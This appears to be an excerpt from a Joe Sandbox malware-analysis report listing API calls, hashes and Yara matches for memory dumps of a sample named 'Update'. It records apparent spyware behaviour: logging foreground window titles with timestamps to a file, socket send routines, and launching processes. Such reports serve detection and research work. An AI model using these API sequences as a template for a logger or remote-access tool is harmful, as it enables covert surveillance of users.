                                                                                                • Opcode Fuzzy Hash: f9e9e3c5f85a9396c58d0e811c6a772e6e8b8bf194744a3e55c98ac89ef18c7f
                                                                                                • Instruction Fuzzy Hash: 5351BCB6A04601DFE311DFA8D985B6AB7F4FF48751F01462EE90A8B740DB36E8008B91
                                                                                                APIs
                                                                                                • SetLastError.KERNEL32(0000139F,100191B0,100151A4,?,?,00000001), ref: 00C74C9D
                                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 00C74CC4
                                                                                                • SetLastError.KERNEL32(0000139F), ref: 00C74CD8
                                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 00C74CDF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3509855269.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_c70000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                • String ID:
                                                                                                • API String ID: 2124651672-0
                                                                                                • Opcode ID: af4dd6d02dae8317ea51440de5c541b076cfcb0791ac4141c68a838fd91fdb3b
                                                                                                • Instruction ID: 817adf9b2fd32e2230fd9e18606d14ceeff0757205f65d09031528aa254b02c2
                                                                                                • Opcode Fuzzy Hash: af4dd6d02dae8317ea51440de5c541b076cfcb0791ac4141c68a838fd91fdb3b
                                                                                                • Instruction Fuzzy Hash: AF51D076A04604DFD324DFA8C985A6AF7F4FF48711F04862EE91ADB741EB35E9008B90
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 037FE751
                                                                                                • GetForegroundWindow.USER32(?,74DF23A0,00000000), ref: 037FE759
                                                                                                • GetWindowTextW.USER32(00000000,038216F0,00000800), ref: 037FE76F
                                                                                                • _memset.LIBCMT ref: 037FE78D
                                                                                                • lstrlenW.KERNEL32(038216F0,?,?,?,?,74DF23A0,00000000), ref: 037FE7AC
                                                                                                • GetLocalTime.KERNEL32(?,?,?,?,?,74DF23A0,00000000), ref: 037FE7BD
                                                                                                • wsprintfW.USER32 ref: 037FE804
                                                                                                  • Part of subcall function 037FE6B0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,037FE815,?,?,?,?,74DF23A0,00000000), ref: 037FE6BD
                                                                                                  • Part of subcall function 037FE6B0: CreateFileW.KERNEL32(03820D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,037FE815,?,?,?,?,74DF23A0,00000000), ref: 037FE6D7
                                                                                                  • Part of subcall function 037FE6B0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 037FE6F2
                                                                                                  • Part of subcall function 037FE6B0: lstrlenW.KERNEL32(?,00000000,00000000), ref: 037FE6FF
                                                                                                  • Part of subcall function 037FE6B0: WriteFile.KERNEL32(00000000,?,00000000), ref: 037FE70A
                                                                                                  • Part of subcall function 037FE6B0: CloseHandle.KERNEL32(00000000), ref: 037FE711
                                                                                                  • Part of subcall function 037FE6B0: ReleaseMutex.KERNEL32(00000000), ref: 037FE71E
                                                                                                • _memset.LIBCMT ref: 037FE820
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File_memset$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
                                                                                                • String ID: [
                                                                                                • API String ID: 2192163267-4056885943
                                                                                                • Opcode ID: 2000000a4d28b1037ab33b00bdd74a84d87e71af2d577f664c095e8ed5e749eb
                                                                                                • Instruction ID: 566372d150937d4509da4f73068d4a1507e77cddf938c0541a86eee0d7403384
                                                                                                • Opcode Fuzzy Hash: 2000000a4d28b1037ab33b00bdd74a84d87e71af2d577f664c095e8ed5e749eb
                                                                                                • Instruction Fuzzy Hash: 0421F375A00228AAC760EFA49C09FBEB7BDFB04700F10C1E5F94596280EE7459C4CBE4
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,037F398D,?,00000000,000000FF,00000000), ref: 037F3E05
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,037F398D,?,00000000,000000FF,00000000), ref: 037F3E50
                                                                                                • send.WS2_32(?,000000FF,00000000,00000000), ref: 037F3E6E
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 037F3E81
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 037F3E94
                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,037F398D,?,00000000,000000FF,00000000), ref: 037F3EBC
                                                                                                • WSAGetLastError.WS2_32(?,?,037F398D,?,00000000,000000FF,00000000), ref: 037F3EC7
                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,037F398D,?,00000000,000000FF,00000000), ref: 037F3EDB
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 037F3F14
                                                                                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 037F3F51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                                                                                                • String ID:
                                                                                                • API String ID: 1701177279-0
                                                                                                • Opcode ID: bb21d63e84740d0aad758f275e05b31273d44e478c64702f725eb6c067b7d061
                                                                                                • Instruction ID: 40e45b28d7d4de6a7908b31c69dca94c5673cc7ba7ab5df139d6aa44aa3b664d
                                                                                                • Opcode Fuzzy Hash: bb21d63e84740d0aad758f275e05b31273d44e478c64702f725eb6c067b7d061
                                                                                                • Instruction Fuzzy Hash: 30412775504A049FD724DF78D888AABF7F8FF48304F4489AEEA6ECB244D731A4418B50
                                                                                                APIs
                                                                                                • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 037F4F63
                                                                                                • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 037F4F78
                                                                                                • WSASetLastError.WS2_32(00002746), ref: 037F4F8A
                                                                                                • LeaveCriticalSection.KERNEL32(000002FF), ref: 037F4F91
                                                                                                • timeGetTime.WINMM ref: 037F4FBF
                                                                                                • timeGetTime.WINMM ref: 037F4FE7
                                                                                                • SetEvent.KERNEL32(?), ref: 037F5025
                                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 037F5031
                                                                                                • LeaveCriticalSection.KERNEL32(000002FF), ref: 037F5038
                                                                                                • LeaveCriticalSection.KERNEL32(000002FF), ref: 037F504B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                                • String ID:
                                                                                                • API String ID: 1979691958-0
                                                                                                • Opcode ID: 90d74416eb902a6c46c41ca60f42fdfe38a95d1ec191e25b70b51f247f39aa35
                                                                                                • Instruction ID: 4184bbb1809bbf4655053cda705aee07124e42df14feafcdf02e67db4bc67dd5
                                                                                                • Opcode Fuzzy Hash: 90d74416eb902a6c46c41ca60f42fdfe38a95d1ec191e25b70b51f247f39aa35
                                                                                                • Instruction Fuzzy Hash: FD41A031600604DFD720EF7AD588A6AF7EDFB48324F084A99EA4A87751E375E4418B81
                                                                                                APIs
                                                                                                • WSASetLastError.WS2_32(0000000D), ref: 10004F43
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 10004F58
                                                                                                • WSASetLastError.WS2_32(00002746), ref: 10004F6A
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 10004F71
                                                                                                • timeGetTime.WINMM ref: 10004F9F
                                                                                                • timeGetTime.WINMM ref: 10004FC7
                                                                                                • SetEvent.KERNEL32(?), ref: 10005005
                                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 10005011
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 10005018
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 1000502B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                                • String ID:
                                                                                                • API String ID: 1979691958-0
                                                                                                • Opcode ID: 0eddb7f70435084fad788b00feb35f5cb1569ae860eba9b4df7dc0cd97004f8a
                                                                                                • Instruction ID: 4b24d02a6ebada58952bd9850e7d83bafc68aeb9978cf5702291cfe2885936af
                                                                                                • Opcode Fuzzy Hash: 0eddb7f70435084fad788b00feb35f5cb1569ae860eba9b4df7dc0cd97004f8a
                                                                                                • Instruction Fuzzy Hash: 91410971600242DFF320DF68C988B5AB7F5FF48395F068569E54ACB255EB76EC408B81
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 037FC2AE
                                                                                                • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 037FC2CC
                                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 037FC309
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 037FC314
                                                                                                • lstrlenW.KERNEL32(?), ref: 037FC321
                                                                                                • wsprintfW.USER32 ref: 037FC345
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandleWrite_memsetlstrlenwsprintf
                                                                                                • String ID: %s %s
                                                                                                • API String ID: 1326869720-2939940506
                                                                                                • Opcode ID: 9c3c11ef24203d8f416ddfae940c8b33212a13ea28bd6fb667e7a48370d0853f
                                                                                                • Instruction ID: e9c6c0488db8ab6bd481215bf6fa0aacf40b8c523b38ab44199236ad15b92e89
                                                                                                • Opcode Fuzzy Hash: 9c3c11ef24203d8f416ddfae940c8b33212a13ea28bd6fb667e7a48370d0853f
                                                                                                • Instruction Fuzzy Hash: BB31923264021D6FDB25EA64DC85FEFB36CFB49311F4006D9F605A6280EA746A44CBA1
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(?), ref: 037FC98D
                                                                                                • _wcsrchr.LIBCMT ref: 037FC9C7
                                                                                                  • Part of subcall function 037F7C80: LoadLibraryW.KERNEL32(wininet.dll), ref: 037F7CC3
                                                                                                  • Part of subcall function 037F7C80: GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 037F7CD7
                                                                                                  • Part of subcall function 037F7C80: FreeLibrary.KERNEL32(00000000), ref: 037F7CF7
                                                                                                • GetFileAttributesW.KERNEL32(-00000002), ref: 037FC9E6
                                                                                                • GetLastError.KERNEL32 ref: 037FC9F1
                                                                                                • _memset.LIBCMT ref: 037FCA04
                                                                                                • CreateProcessW.KERNEL32(00000000,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 037FCA31
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library$AddressAttributesCreateErrorFileFreeLastLoadProcProcess_memset_wcsrchrlstrlen
                                                                                                • String ID: D$WinSta0\Default
                                                                                                • API String ID: 174883095-1101385590
                                                                                                • Opcode ID: a6b2f74666a7e7449a1e33ed7d9e2727b5c41ccbf507ca9f92eaeef2fe8421c4
                                                                                                • Instruction ID: b6a0ede13ce72d069066189ec39dd9be135463ac314ab2d89f7a52725f11e869
                                                                                                • Opcode Fuzzy Hash: a6b2f74666a7e7449a1e33ed7d9e2727b5c41ccbf507ca9f92eaeef2fe8421c4
                                                                                                • Instruction Fuzzy Hash: 9911EBB69002086BD725EAB89C85FAFB76CEB45710F040265FB06DE3C4E635E505C6A2
                                                                                                APIs
                                                                                                • lstrcmpiW.KERNEL32(?,A:\), ref: 037F8166
                                                                                                • lstrcmpiW.KERNEL32(?,B:\), ref: 037F8176
                                                                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 037F81A6
                                                                                                • lstrlenW.KERNEL32(?), ref: 037F81B7
                                                                                                • __wcsnicmp.LIBCMT ref: 037F81CE
                                                                                                • lstrcpyW.KERNEL32(00000AD4,?), ref: 037F8204
                                                                                                • lstrcpyW.KERNEL32(?,?), ref: 037F8228
                                                                                                • lstrcatW.KERNEL32(?,00000000), ref: 037F8233
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcmpilstrcpy$DeviceQuery__wcsnicmplstrcatlstrlen
                                                                                                • String ID: A:\$B:\
                                                                                                • API String ID: 4249875308-1009255891
                                                                                                • Opcode ID: cc2455cbf8abf4244679eb8f50701288f70afe87e0a99efe3453f63baf54af72
                                                                                                • Instruction ID: 435194205a1461204d66c669f7aa5648ad5c1d3f804f4ab41c58dfba64da5914
                                                                                                • Opcode Fuzzy Hash: cc2455cbf8abf4244679eb8f50701288f70afe87e0a99efe3453f63baf54af72
                                                                                                • Instruction Fuzzy Hash: 49114C72A01218EFDB24EFA0DD45BAEB378FF44210F0445D8DA1AA7240E774EA05CB95
                                                                                                APIs
                                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,4EB10097,00000000,?,?,?,00000000,0381125B,000000FF,?,037FE04E,00000000), ref: 037F9773
                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(037FE1AE,00000000,?,?,?,00000000,0381125B,000000FF,?,037FE04E), ref: 037F9812
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0381125B,000000FF,?,037FE04E), ref: 037F9850
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0381125B,000000FF,?,037FE04E), ref: 037F9875
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0381125B,000000FF,?,037FE04E), ref: 037F989A
                                                                                                  • Part of subcall function 037F1280: __CxxThrowException@8.LIBCMT ref: 037F1290
                                                                                                  • Part of subcall function 037F1280: DeleteCriticalSection.KERNEL32(00000000,037FD3E6,03816624,?,?,037FD3E6,?,?,?,?,03815A40,00000000), ref: 037F12A1
                                                                                                  • Part of subcall function 037FCE10: InitializeCriticalSectionAndSpinCount.KERNEL32(037FE076,00000000,4EB10097,037FE04E,74DF2F60,00000000,?,037FE226,0381110B,000000FF,?,037F994A,037FE226), ref: 037FCE67
                                                                                                  • Part of subcall function 037FCE10: InitializeCriticalSectionAndSpinCount.KERNEL32(037FE08E,00000000,?,037FE226,0381110B,000000FF,?,037F994A,037FE226,?,?,?,00000000,0381125B,000000FF), ref: 037FCE83
                                                                                                • InterlockedExchange.KERNEL32(037FE066,00000000), ref: 037F99A0
                                                                                                • timeGetTime.WINMM(?,?,?,00000000,0381125B,000000FF,?,037FE04E), ref: 037F99A6
                                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,0381125B,000000FF,?,037FE04E), ref: 037F99B4
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0381125B,000000FF,?,037FE04E), ref: 037F99BD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                                • String ID:
                                                                                                • API String ID: 1400036169-0
                                                                                                • Opcode ID: d788190d1c7e5ab9e6b06e4d0cc3f4444046a4ce8c0b662c58293704bb45c86b
                                                                                                • Instruction ID: 9fef885121d930e635084af44b94a8f93c78300f735b3834be4cc48fb97bb413
                                                                                                • Opcode Fuzzy Hash: d788190d1c7e5ab9e6b06e4d0cc3f4444046a4ce8c0b662c58293704bb45c86b
                                                                                                • Instruction Fuzzy Hash: 1E81D5B0A01A46BFE344DF7AC88479AFBA8FB09354F50426ED12CD7640D775A964CF90
                                                                                                APIs
                                                                                                  • Part of subcall function 037F3660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 037F3667
                                                                                                  • Part of subcall function 037F3660: _free.LIBCMT ref: 037F369C
                                                                                                  • Part of subcall function 037F3660: _malloc.LIBCMT ref: 037F36D7
                                                                                                  • Part of subcall function 037F3660: _memset.LIBCMT ref: 037F36E5
                                                                                                • InterlockedIncrement.KERNEL32(03821F0C), ref: 037F3565
                                                                                                • InterlockedIncrement.KERNEL32(03821F0C), ref: 037F3573
                                                                                                • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 037F359A
                                                                                                • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 037F35B3
                                                                                                • ResetEvent.KERNEL32(?,?,?,03821F0C), ref: 037F35EE
                                                                                                • SetLastError.KERNEL32(00000000), ref: 037F3621
                                                                                                • GetLastError.KERNEL32 ref: 037F3639
                                                                                                  • Part of subcall function 037F3F60: GetCurrentThreadId.KERNEL32 ref: 037F3F65
                                                                                                  • Part of subcall function 037F3F60: send.WS2_32(?,038149C0,00000010,00000000), ref: 037F3FC6
                                                                                                  • Part of subcall function 037F3F60: SetEvent.KERNEL32(?), ref: 037F3FE9
                                                                                                  • Part of subcall function 037F3F60: InterlockedExchange.KERNEL32(?,00000000), ref: 037F3FF5
                                                                                                  • Part of subcall function 037F3F60: WSACloseEvent.WS2_32(?), ref: 037F4003
                                                                                                  • Part of subcall function 037F3F60: shutdown.WS2_32(?,00000001), ref: 037F401B
                                                                                                  • Part of subcall function 037F3F60: closesocket.WS2_32(?), ref: 037F4025
                                                                                                • SetLastError.KERNEL32(00000000), ref: 037F3649
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                • String ID:
                                                                                                • API String ID: 127459856-0
                                                                                                • Opcode ID: 855c102c851bd431d5f75ab64d392ce790b0a79df3e7856605e69fd5d8b40182
                                                                                                • Instruction ID: 3056cced38423f23a9ae3e146d92547e43d238342b6b1c62a26be84ab13fd8df
                                                                                                • Opcode Fuzzy Hash: 855c102c851bd431d5f75ab64d392ce790b0a79df3e7856605e69fd5d8b40182
                                                                                                • Instruction Fuzzy Hash: 1C415BB9600704AFE360EF69DC81B6AF7E8FB88711F10496EE646D7740D7B5E4448B50
                                                                                                APIs
                                                                                                  • Part of subcall function 10003660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 10003667
                                                                                                  • Part of subcall function 10003660: _free.LIBCMT ref: 1000369C
                                                                                                  • Part of subcall function 10003660: _malloc.LIBCMT ref: 100036D7
                                                                                                  • Part of subcall function 10003660: _memset.LIBCMT ref: 100036E5
                                                                                                • InterlockedIncrement.KERNEL32(1001D990), ref: 10003565
                                                                                                • InterlockedIncrement.KERNEL32(1001D990), ref: 10003573
                                                                                                • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 1000359A
                                                                                                • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 100035B3
                                                                                                • ResetEvent.KERNEL32(?,?,?,1001D990), ref: 100035EE
                                                                                                • SetLastError.KERNEL32(00000000), ref: 10003621
                                                                                                • GetLastError.KERNEL32 ref: 10003639
                                                                                                  • Part of subcall function 10003F60: GetCurrentThreadId.KERNEL32 ref: 10003F65
                                                                                                  • Part of subcall function 10003F60: send.WS2_32(?,10017440,00000010,00000000), ref: 10003FC6
                                                                                                  • Part of subcall function 10003F60: SetEvent.KERNEL32(?), ref: 10003FE9
                                                                                                  • Part of subcall function 10003F60: InterlockedExchange.KERNEL32(?,00000000), ref: 10003FF5
                                                                                                  • Part of subcall function 10003F60: WSACloseEvent.WS2_32(?), ref: 10004003
                                                                                                  • Part of subcall function 10003F60: shutdown.WS2_32(?,00000001), ref: 1000401B
                                                                                                  • Part of subcall function 10003F60: closesocket.WS2_32(?), ref: 10004025
                                                                                                • SetLastError.KERNEL32(00000000), ref: 10003649
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                • String ID:
                                                                                                • API String ID: 127459856-0
                                                                                                • Opcode ID: 27567248ad9cb40579700c88c4b0573dbe1feeef2cc9a6d62e2a760125df68bb
                                                                                                • Instruction ID: 683d4fe1a0db9e8cd201fdded36c2c75d02b426da01d37e97b5f8f569f7a2aba
                                                                                                • Opcode Fuzzy Hash: 27567248ad9cb40579700c88c4b0573dbe1feeef2cc9a6d62e2a760125df68bb
                                                                                                • Instruction Fuzzy Hash: 8041AFB5600704AFE360EF69CC81B9BB7E8FB48341F50882EE646D7690D7B1F8448B90
                                                                                                APIs
                                                                                                • ResetEvent.KERNEL32(?), ref: 037F4443
                                                                                                • ResetEvent.KERNEL32(?), ref: 037F444C
                                                                                                • timeGetTime.WINMM ref: 037F444E
                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 037F445D
                                                                                                • WaitForSingleObject.KERNEL32(?,00001770), ref: 037F44AB
                                                                                                • ResetEvent.KERNEL32(?), ref: 037F44C8
                                                                                                  • Part of subcall function 037F3F60: GetCurrentThreadId.KERNEL32 ref: 037F3F65
                                                                                                  • Part of subcall function 037F3F60: send.WS2_32(?,038149C0,00000010,00000000), ref: 037F3FC6
                                                                                                  • Part of subcall function 037F3F60: SetEvent.KERNEL32(?), ref: 037F3FE9
                                                                                                  • Part of subcall function 037F3F60: InterlockedExchange.KERNEL32(?,00000000), ref: 037F3FF5
                                                                                                  • Part of subcall function 037F3F60: WSACloseEvent.WS2_32(?), ref: 037F4003
                                                                                                  • Part of subcall function 037F3F60: shutdown.WS2_32(?,00000001), ref: 037F401B
                                                                                                  • Part of subcall function 037F3F60: closesocket.WS2_32(?), ref: 037F4025
                                                                                                • ResetEvent.KERNEL32(?), ref: 037F44DC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                • String ID:
                                                                                                • API String ID: 542259498-0
                                                                                                • Opcode ID: f59584795ff6bfb714dee33f99238dde0dd1f8159288b5000826849030778c61
                                                                                                • Instruction ID: b75b73d92d9a5d04a58fa5415f99700d1b2b984c07b039d7b5a37f3028747520
                                                                                                • Opcode Fuzzy Hash: f59584795ff6bfb714dee33f99238dde0dd1f8159288b5000826849030778c61
                                                                                                • Instruction Fuzzy Hash: 1E216176600B04ABC630EF79DC84AA7B3E8FF89710F100A5EE69AC7640D671F404CBA1
                                                                                                APIs
                                                                                                • ResetEvent.KERNEL32(?), ref: 10004443
                                                                                                • ResetEvent.KERNEL32(?), ref: 1000444C
                                                                                                • timeGetTime.WINMM ref: 1000444E
                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 1000445D
                                                                                                • WaitForSingleObject.KERNEL32(?,00001770), ref: 100044AB
                                                                                                • ResetEvent.KERNEL32(?), ref: 100044C8
                                                                                                  • Part of subcall function 10003F60: GetCurrentThreadId.KERNEL32 ref: 10003F65
                                                                                                  • Part of subcall function 10003F60: send.WS2_32(?,10017440,00000010,00000000), ref: 10003FC6
                                                                                                  • Part of subcall function 10003F60: SetEvent.KERNEL32(?), ref: 10003FE9
                                                                                                  • Part of subcall function 10003F60: InterlockedExchange.KERNEL32(?,00000000), ref: 10003FF5
                                                                                                  • Part of subcall function 10003F60: WSACloseEvent.WS2_32(?), ref: 10004003
                                                                                                  • Part of subcall function 10003F60: shutdown.WS2_32(?,00000001), ref: 1000401B
                                                                                                  • Part of subcall function 10003F60: closesocket.WS2_32(?), ref: 10004025
                                                                                                • ResetEvent.KERNEL32(?), ref: 100044DC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                • String ID:
                                                                                                • API String ID: 542259498-0
                                                                                                • Opcode ID: f834a32b78aad868db6c3b299e2b280971fbcefdd6bd4d0406109023f8606c47
                                                                                                • Instruction ID: e23a36aee9568f488b14e02ccbdce45cc04d01c91958f2c1d86c028973892dd3
